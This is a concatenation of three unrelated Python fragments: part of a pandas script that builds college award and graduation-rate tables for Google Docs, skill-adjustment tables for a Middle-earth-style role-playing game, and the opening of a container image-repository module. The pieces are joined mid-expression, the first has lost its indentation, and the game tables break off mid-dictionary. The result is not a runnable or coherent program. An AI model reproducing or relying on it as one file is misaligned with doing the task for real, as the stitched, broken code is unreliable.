    df["Stra-tegy"] = df[["GPA", "local_sat_max"]].apply(
        _get_strategies, axis=1, args=(strat_df,)
    )
    df["Target Grad Rate"] = df[["Stra-tegy", "GPA", "EFC", "Race/ Eth"]].apply(
        _get_gr_target, axis=1, args=(target_df, "target")
    )
    df["Ideal Grad Rate"] = df[["Stra-tegy", "GPA", "EFC", "Race/ Eth"]].apply(
        _get_gr_target, axis=1, args=(target_df, "ideal")
    )
    if debug:
        print("Total roster length of {}.".format(len(df)))
    return df
def make_clean_gdocs(dfs, config, debug):
"""
Creates a set of tables for pushing to Google Docs assuming there
is no existing award data based on the applications and roster files
"""
# Pullout local config settings:
ros_df = dfs["ros"]
app_df = dfs["app"]
college_df = dfs["college"]
award_fields = config["award_fields"]
efc_tab_fields = config["efc_tab_fields"]
include_statuses = config["app_status_to_include"]
award_sort = config["award_sort"]
if debug:
print('Creating "Blank" Google Docs tables from source csvs', flush=True)
# #####################################################
# First do the (simpler) EFC tab, which is just a combination of
# direct columns from the roster plus some blank columns
efc_pull_fields = [field for field in efc_tab_fields if field in ros_df.columns]
# the line below skips the first column because it is assumed to be
# the index
efc_blank_fields = [
field for field in efc_tab_fields[1:] if field not in ros_df.columns
]
efc_df = ros_df[efc_pull_fields]
efc_df = efc_df.reindex(columns=efc_df.columns.tolist() + efc_blank_fields)
# #####################################################
# Now do the more complicated awards tab
current_students = list(efc_df.index)
award_df = app_df[app_df["hs_student_id"].isin(current_students)].copy()
# Do all of the lookups from the roster table:
for dest, source, default in (
("lf", "LastFirst", "StudentMissing"),
("tgr", "Target Grad Rate", np.nan),
("igr", "Ideal Grad Rate", np.nan),
("race", "Race/ Eth", "N/A"),
):
award_df[dest] = award_df["hs_student_id"].apply(
lambda x: ros_df[source].get(x, default)
)
# Now do all lookups from the college table:
for dest, source, default in (
("cname", "INSTNM", "NotAvail"),
("barrons", "SimpleBarrons", "N/A"),
("local", "Living", "Campus"),
("sixyrgr", "Adj6yrGrad_All", np.nan),
("sixyrgraah", "Adj6yrGrad_AA_Hisp", np.nan),
):
award_df[dest] = award_df["NCES"].apply(
lambda x: college_df[source].get(x, default)
)
# Cleanup from college table for missing values
award_df["cname"] = award_df[["cname", "collegename"]].apply(
lambda x: x[1] if x[0] == "NotAvail" else x[0], axis=1
)
award_df["barrons"] = award_df["barrons"].apply(_make_barrons_translation)
award_df["sixyrfinal"] = award_df[
["race", "sixyrgr", "sixyrgraah", "comments"]
].apply(_make_final_gr, axis=1)
# Other interpreted/calculated values:
award_df["final_result"] = award_df[
["result_code", "attending", "waitlisted", "deferred", "stage", "type"]
].apply(_get_final_result, axis=1)
# Calculated or blank columns (we'll push the calculations with AppsScript)
for f in [
"Award Receiv- ed?",
"Tuition & Fees (including insurance if req.)",
"Room & board (if not living at home)",
"College grants & scholarships",
"Government grants (Pell/SEOG/MAP)",
"Net Price (before Loans) <CALCULATED>",
"Student Loans offered (include all non-parent)",
"Out of Pocket Cost (Direct Cost-Grants-Loans) <CALCULATED>",
"Your EFC <DRAWN FROM OTHER TAB>",
"Unmet need <CALCULATED>",
"Work Study (enter for comparison if desired)",
"Award",
]:
award_df[f] = ""
# Still need to double up home colleges for home/away rows
both_rows = award_df[award_df["local"] == "Both"].copy()
# 'Both' rows become 'Home' here and the replicants (above) will be Away
award_df["cname"] = award_df[["cname", "local"]].apply(
lambda x: x[0] + ("" if x[1] == "Campus" else "--At Home"), axis=1
)
award_df["local"] = award_df["local"].apply(lambda x: "Home" if x == "Both" else x)
award_df["Unique"] = 1
# these are the duplicate rows
both_rows["local"] = "Campus"
both_rows["Unique"] = 0
both_rows["cname"] = both_rows["cname"] + "--On Campus"
award_df = pd.concat([award_df, both_rows])
# Keep different statuses based on config file
award_df = award_df[award_df["final_result"].isin(include_statuses)]
# Rename labels to match what will be in the doc
mapper = {
"lf": "Student",
"tgr": "Target Grad Rate",
"igr": "Ideal Grad Rate",
"cname": "College/University",
"barrons": "Selectivity\n"
+ "1=Most+\n"
+ "2=Most\n"
+ "3=Highly\n"
+ "4=Very\n"
+ "5=Competitive\n"
+ "6=Less\n"
+ "7=Non\n"
+ "8=2 year",
"final_result": "Result (from Naviance)",
"sixyrfinal": "6-Year Minority Grad Rate",
"hs_student_id": "SID",
"NCES": "NCESid",
"local": "Home/Away",
}
use_mapper = {key: value for key, value in mapper.items() if value in award_fields}
award_df.rename(columns=use_mapper, inplace=True)
# Final reduce the table to just what's going in the Google Doc
award_df = award_df[award_fields]
# Sort the table based on config file
| |
"DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"PRO":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":1, "DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":1, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"BEO":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":1, "UNA":0,
"WEA":0
}.items())),
"DUL":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":2, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOB":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":1, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOE":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":1, "DEB":1, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOG":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":1, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":1,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"ROR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":2, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"EAS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":2, "RID":1, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SOU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":1, "RID":1, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":1, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MOM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":1,
"MIM":0, "OBS":0, "PER":0, "PRS":1, "RAN":1, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items()))
}
#ORDER PACKAGES
# Training-package display names, one dict per profession, keyed by the
# short package code ("N" = no package).
barpacks = {"N":"None", "BBAR":"Basic Barbarian", "DRU":"Druadan Tribesman", "SON":"Southron Nomad", "LOS":"Losson Tribesman", "MOU":"Mountain Folk"}
crapacks = {"N":"None", "BCRA":"Basic Craftsman", "GAR":"Gardener", "INN":"Innkeeper", "SMI":"Smith", "MAS":"Stonemason"}
lorpacks = {"N":"None", "BLOR":"Basic Loremaster", "ERI":"Eriadorian Sage", "GOS":"Gondorian Scholar", "MTH":"Minas Tirith Healer", "RIS":"Rivendell Scholar", "WIW":"Wise Woman"}
magpacks = {"N":"None", "BMAG":"Basic Magician", "WIA":"Wizards Apprentice", "SSA":"Student of the Secret Arts", "TRM":"Travelling Magician", "TIM":"Tribal Magician"}
marpacks = {"N":"None", "BMAR":"Basic Mariner", "FIS":"Fisherman", "NAV":"Navy", "RIV":"Riverman", "SHI":"Shipwright"}
# NOTE(review): "ROB":"Ro<NAME>" below looks like a redacted/garbled
# display name -- confirm against the original data source.
minpacks = {"N":"None", "BMIN":"Basic Minstrel", "GOM":"Gondorian Minstrel", "PER":"Performer", "ROB":"Ro<NAME>", "TRC":"Tribal Chanter"}
nobpacks = {"N":"None", "BNOB":"Basic Noble", "GOL":"Gondorian Lord", "ERG":"Eriadorian Gentry", "LOF":"Leader of Folk", "CHF":"Tribal Chieftain"}
rogpacks = {"N":"None", "BROG":"Basic Rogue", "BUR":"Burglar", "OUT":"Outlaw", "LUR":"Lurker", "PIC":"Pickpocket"}
warpacks = {"N":"None", "BWAR":"Basic Warrior", "BOW":"Bowman", "HOR":"Horseman", "SCO":"Scout", "SEN":"Sentinel", "SHR":"Shirriff"}
# Master index: profession code -> that profession's package dict.
packs = {"BAR":barpacks, "CRA":crapacks, "LOR":lorpacks, "MAG":magpacks, "MAR":marpacks, "MIN":minpacks, "NOB":nobpacks, "ROG":rogpacks, "WAR":warpacks}
packskilladjs = {
"N":skilltemp,
"BBAR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":3, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":3, "UNA":0,
"WEA":0
}.items())),
"DRU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":1, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":1, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":3, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":3, "UNA":0,
"WEA":0
}.items())),
"SON":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":2, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"LOS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":2, "RID":0, "RUN":2, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"MOU":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":3, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":0, "RAN":1, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":2, "STO":0, "SUR":3, "SWI":0, "TEA":0, "TRA":2, "UNA":0,
"WEA":0
}.items())),
"BCRA":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":4, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":1, "STE":0, "STO":1, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"GAR":collections.OrderedDict(sorted({
"ACR":0, "APP":1, "ARM":0, "CLI":0, "CON":0, "CRA":5, "DEB":0, "GAM":2, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":3,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"INN":collections.OrderedDict(sorted({
"ACR":0, "APP":2, "ARM":0, "CLI":0, "CON":0, "CRA":6, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":2,
"MIM":0, "OBS":1, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SMI":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":3, "STE":0, "STO":1, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MAS":collections.OrderedDict(sorted({
"ACR":0, "APP":3, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":2, "PER":2, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":1, "STE":0, "STO":3, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"BLOR":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":3, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"ERI":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":2, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":2, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":3,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"GOS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":3, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":1, "PER":1, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"MTH":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":3, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":8,
"MIM":0, "OBS":2, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"RIS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":1, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":2, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":1, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"WIW":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":0, "JUM":0, "LAN":0, "LEG":0, "LOR":6,
"MIM":0, "OBS":2, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":2
}.items())),
"BMAG":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":2, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":1, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"WIA":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":1, "GAM":0, "GUI":0, "HEA":0, "INQ":1, "ING":1, "INP":1, "INM":2, "JUM":0, "LAN":2, "LEG":0, "LOR":4,
"MIM":0, "OBS":1, "PER":0, "PRS":1, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"SSA":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":2, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":2, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":1, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"TRM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":1, "JUM":0, "LAN":3, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":0
}.items())),
"TIM":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":0, "CLI":0, "CON":0, "CRA":0, "DEB":0, "GAM":0, "GUI":0, "HEA":1, "INQ":0, "ING":1, "INP":0, "INM":2, "JUM":0, "LAN":1, "LEG":0, "LOR":5,
"MIM":0, "OBS":2, "PER":0, "PRS":2, "RAN":0, "RID":0, "RUN":0, "SEA":0, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":0, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"BMAR":collections.OrderedDict(sorted({
"ACR":1, "APP":0, "ARM":2, "CLI":2, "CON":0, "CRA":1, "DEB":0, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":0, "SEA":3, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":3, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"FIS":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":1, "CLI":1, "CON":0, "CRA":3, "DEB":0, "GAM":1, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":3, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":3, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"NAV":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":2, "CON":0, "CRA":1, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, | |
"""Manage images.
We make an important design decision: Importing images requires root
privilege; unlike rkt, which does not. We make this decision for the
simplicity of implementation. To not require root privilege, rkt has to
split import into two steps:
* The first step, the ``fetch`` command, merely copies a tar archive to
the image repository (after optionally verifying archive's signature).
This step does not require root privilege given that the image
repository's directory write permission is properly configured.
* The second step, the ``prepare`` command, extracts the tar archive.
This step requires root privilege to create files extracted from the
tar archive that are owned by root.
In the future we might adopt rkt's design; for now, we trade security
for implementation simplicity.
Image repository layout:
* Under ``images`` there are three top-level directories: trees, tags,
and tmp.
* ``trees`` is the directory of extracted tar archives.
* ``trees/<sha512>`` is the directory of an image, where ``sha512`` is
the SHA512 of the tar archive.
* ``trees/<sha512>/metadata`` stores image metadata in JSON format.
* ``trees/<sha512>/rootfs`` is the root directory of image.
* ``tags`` is a directory of symlinks to images under ``trees``.
* ``tmp`` is a scratchpad for extracting the tar archive. After the
extraction is completed, the output is moved into the ``trees``
directory.
"""
# Explicit public API, grouped by intended consumer (see comments).
__all__ = [
    # Public interface.
    'ImageMetadata',
    # Expose to apps.
    'IMAGE_LIST_STRINGIFIERS',
    'cmd_build_image',
    'cmd_cleanup',
    'cmd_import',
    'cmd_init',
    'cmd_list',
    'cmd_remove',
    'cmd_remove_tag',
    'cmd_tag',
    'make_select_image_kwargs',
    # Expose to builders, pods, and xars.
    'add_ref',
    'build_image',
    'find_id',
    'find_name_and_version',
    'get_image_dir_path',
    'get_rootfs_path',
    'get_trees_path',
    'read_metadata',
    'select_image_arguments',
    'touch',
]
import contextlib
import dataclasses
import datetime
import gzip
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
from pathlib import Path
import g1.files
from g1 import scripts
from g1.bases import argparses
from g1.bases import datetimes
from g1.bases import functionals
from g1.bases import oses
from g1.bases.assertions import ASSERT
from g1.files import locks
from g1.texts import jsons
from g1.texts.columns import argparses as columns_argparses
from . import bases
from . import models
LOG = logging.getLogger(__name__)
#
# Data type.
#
@dataclasses.dataclass(frozen=True)
class ImageMetadata:
    """Image name/version pair stored in ``trees/<sha512>/metadata``."""

    # Image name and version; both validated on construction.
    name: str
    version: str

    def __post_init__(self):
        # Reject malformed values immediately; the validators raise on
        # bad input (frozen dataclass, so no later mutation to re-check).
        models.validate_image_name(self.name)
        models.validate_image_version(self.version)
#
# Top-level commands. You need to check root privilege and acquire all
# file locks here.
#
# NOTE: When locking multiple top-level directories, lock them in
# alphabetical order to avoid deadlock.
#
# TODO: For now our locking strategy is very naive - we simply lock the
# top-level directory. If this turns out to cause a lot of lock
# contention, we should implement a finer-grained locking strategy.
#
# Composite argparse decorator: callers must supply exactly one of
# --id, --nv NAME VERSION, or --tag to select an image.
select_image_arguments = functionals.compose(
    argparses.begin_mutually_exclusive_group(required=True),
    argparses.argument(
        '--id',
        type=models.validate_image_id,
        help='provide image id',
    ),
    argparses.argument(
        '--nv',
        metavar=('NAME', 'VERSION'),
        # Sadly it looks like you can't use ``type`` with ``nargs``.
        nargs=2,
        help='provide image name and version',
    ),
    argparses.argument(
        '--tag',
        type=models.validate_image_tag,
        help='provide image tag',
    ),
    argparses.end,
)
# Positional arguments shared by commands that write an image archive:
# output image name, version, and destination path.
image_output_arguments = functionals.compose(
    argparses.argument(
        'name',
        type=models.validate_image_name,
        help='provide output image name',
    ),
    argparses.argument(
        'version',
        type=models.validate_image_version,
        help='provide output image version',
    ),
    argparses.argument(
        'output',
        type=Path,
        help='provide output image path',
    ),
)
def make_select_image_kwargs(args):
    """Convert parsed select-image CLI arguments into keyword arguments.

    ``--nv`` arrives as a raw two-element list (argparse can't combine
    ``type`` with ``nargs``), so name and version are validated here.
    """
    name = version = None
    if args.nv:
        name = models.validate_image_name(args.nv[0])
        version = models.validate_image_version(args.nv[1])
    return {
        'image_id': args.id,
        'name': name,
        'version': version,
        'tag': args.tag,
    }
def cmd_init():
    """Initialize the image repository."""
    # For _extract_image.
    scripts.assert_command_exist('tar')
    # For build_image.
    scripts.check_command_exist('tar')
    # NOTE(review): both calls probe the same 'tar' binary; presumably
    # check_* only warns while assert_* raises -- confirm whether one of
    # the two is redundant.
    oses.assert_root_privilege()
    # Repo layout per the module docstring: trees/, tags/, tmp/ under the
    # repo root, owned by the app user with 0750 permissions.
